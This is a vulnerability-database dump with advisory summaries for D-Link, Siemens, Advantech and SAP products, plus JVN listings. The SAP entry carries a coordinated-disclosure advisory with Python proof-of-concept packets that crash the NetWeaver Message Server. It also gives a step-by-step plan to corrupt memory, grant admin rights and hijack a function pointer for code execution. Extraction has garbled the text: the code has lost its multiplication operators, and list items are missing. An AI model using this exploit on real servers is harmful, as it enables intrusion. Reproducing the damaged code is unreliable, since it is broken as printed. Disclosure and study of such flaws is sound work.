var-202305-1520	D-Link DIR-2150 SetSysEmailSettings EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20556. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202407-0490	A vulnerability has been identified in SIMATIC PCS neo V4.0 (All versions), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions), SIMATIC STEP 7 V18 (All versions < V18 Update 2). Affected applications do not properly restrict the .NET BinaryFormatter when deserializing user-controllable input. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300. SIMATIC PCS neo is a distributed control system (DCS). SIMATIC STEP 7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. Totally Integrated Automation Portal (TIA Portal) is a PC software that provides the full range of Siemens digital automation services, from digital planning, integrated engineering to transparent operation
var-201810-0396	Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-202001-0833	A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. Advisory Information Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. Vulnerability Information Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. Vulnerable packages . Older versions are probably affected too, but they were not checked. 5. Non-vulnerable packages . Vendor did not provide this information. 6. Vendor Information, Solutions and Workarounds SAP released the security note 1800603 [2] regarding these issues. 7. Credits Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. Technical Description / Proof of Concept Code The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '39 server_name = '-'+' '39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[] Conected, sending login request" init = 'MESSAGE\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. Gaining remote code execution by overwriting function pointers Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '(20-4) crash+= "LOLO" + ' '(40-4) crash+= " "36 send_packet(connection, crash) print "[] Crash sent !" -----/ 9. Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. References [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. About CoreLabs CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. Disclaimer The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
jvndb-2025-000039	Multiple vulnerabilities in RICOH Streamline NX PC Client	2025-06-13T16:09+09:00	2025-06-13T16:09+09:00
jvndb-2025-000038	UpdateNavi vulnerable to improper restriction of communication channel to intended endpoints	2025-06-12T15:56+09:00	2025-06-12T15:56+09:00
jvndb-2025-000037	Multiple surveillance cameras provided by i-PRO Co., Ltd. vulnerable to cross-site request forgery	2025-06-06T13:56+09:00	2025-06-06T13:56+09:00
jvndb-2025-000036	TimeWorks vulnerable to path traversal	2025-06-03T15:35+09:00	2025-06-03T15:35+09:00
jvndb-2025-000035	Improper file access permission settings in PC Time Tracer	2025-06-03T14:40+09:00	2025-06-03T14:40+09:00
jvndb-2025-000034	Multiple vulnerabilities in wivia 5	2025-05-30T15:57+09:00	2025-05-30T15:57+09:00
jvndb-2025-001238	Multiple out-of-bounds write vulnerabilities in Canon Office/Small Office Multifunction Printers and Laser Printers	2025-01-29T13:41+09:00	2025-05-27T16:06+09:00
jvndb-2025-000032	Mailform Pro CGI generating error messages containing sensitive information	2025-05-26T14:22+09:00	2025-05-26T14:22+09:00
jvndb-2025-000033	Improper pattern file validation in i-FILTER optional feature 'Anti-Virus & Sandbox'	2025-05-23T15:36+09:00	2025-05-23T15:36+09:00
jvndb-2025-005467	Passback vulnerabilities in Canon Production Printers, Office/Small Office Multifunction Printers, and Laser Printers	2025-05-22T15:03+09:00	2025-05-22T15:03+09:00
jvndb-2024-000117	Stack-based buffer overflow vulnerability in multiple laser printers and MFPs which implement Ricoh Web Image Monitor	2024-10-31T16:44+09:00	2025-05-19T17:59+09:00
jvndb-2025-005107	Multiple vulnerabilities in V-SFT	2025-05-16T14:32+09:00	2025-05-16T14:32+09:00
jvndb-2025-005057	Multiple vulnerabilities in I-O DATA network attached hard disk 'HDL-T Series'	2025-05-15T18:27+09:00	2025-05-15T18:27+09:00
jvndb-2025-005050	Multiple vulnerabilities in a-blog cms	2025-05-15T18:11+09:00	2025-05-15T18:11+09:00
jvndb-2025-000031	Pgpool-II vulnerable to authentication bypass by primary weakness	2025-05-15T16:14+09:00	2025-05-15T16:14+09:00
jvndb-2025-004863	Panasonic IR Control Hub vulnerable to Unauthorised firmware loading	2025-05-14T11:30+09:00	2025-05-14T11:30+09:00
jvndb-2025-000030	Reflected cross-site scripting vulnerability in Ricoh laser printers and MFPs which implement Web Image Monitor	2025-05-12T18:00+09:00	2025-05-12T18:00+09:00
jvndb-2025-004671	Multiple vulnerabilities in GL-MT2500 and GL-MT2500A	2025-05-12T17:52+09:00	2025-05-12T17:52+09:00
jvndb-2025-001016	OMRON NJ/NX series vulnerable to path traversal	2025-02-06T18:27+09:00	2025-05-08T17:44+09:00
jvndb-2025-004079	Improper access permission settings in multiple SEIKO EPSON printer drivers for Windows OS	2025-04-30T11:46+09:00	2025-04-30T11:46+09:00
jvndb-2025-004076	Security Update for Trend Micro Trend Vision One (April 2025)	2025-04-30T10:38+09:00	2025-04-30T10:38+09:00
jvndb-2025-000029	Multiple vulnerabilities in Quick Agent	2025-04-25T13:49+09:00	2025-04-25T13:49+09:00
jvndb-2025-000028	i-PRO Configuration Tool vulnerable to use of hard-coded cryptographic key	2025-04-24T13:50+09:00	2025-04-24T13:50+09:00
jvndb-2025-000027	Active! mail vulnerable to stack-based buffer overflow	2025-04-18T16:50+09:00	2025-04-18T16:50+09:00
jvndb-2016-000129	Android OS issue where it is affected by the CRIME attack	2016-07-25T11:15+09:00	2025-04-18T16:36+09:00
jvndb-2025-003213	TP-Link Deco BE65 Pro vulnerable to OS command injection	2025-04-11T13:52+09:00	2025-04-11T13:52+09:00
jvndb-2025-000026	Multiple vulnerabilities in BizRobo!	2025-04-10T15:36+09:00	2025-04-10T15:36+09:00
jvndb-2025-003091	Multiple vulnerabilities in Trend Micro Endpoint security products for enterprises (April 2025)	2025-04-09T14:55+09:00	2025-04-09T14:55+09:00
jvndb-2025-002990	Multiple vulnerabilities in Inaba Denki Sangyo Wi-Fi AP UNIT 'AC-WPS-11ac series'	2025-04-07T17:44+09:00	2025-04-07T17:44+09:00
jvndb-2025-002714	Improper symbolic link file handling in FutureNet NXR series, VXR series and WXR series routers	2025-03-31T16:59+09:00	2025-04-03T15:19+09:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description
ts-2025-004	TS-2025-004
ts-2025-003	TS-2025-003
ts-2025-002	TS-2025-002
ts-2025-001	TS-2025-001
ts-2024-013	TS-2024-013
ts-2024-012	TS-2024-012
ts-2024-011	TS-2024-011
ts-2024-010	TS-2024-010
ts-2024-009	TS-2024-009
ts-2024-008	TS-2024-008
ts-2024-007	TS-2024-007
ts-2024-006	TS-2024-006
ts-2024-005	TS-2024-005
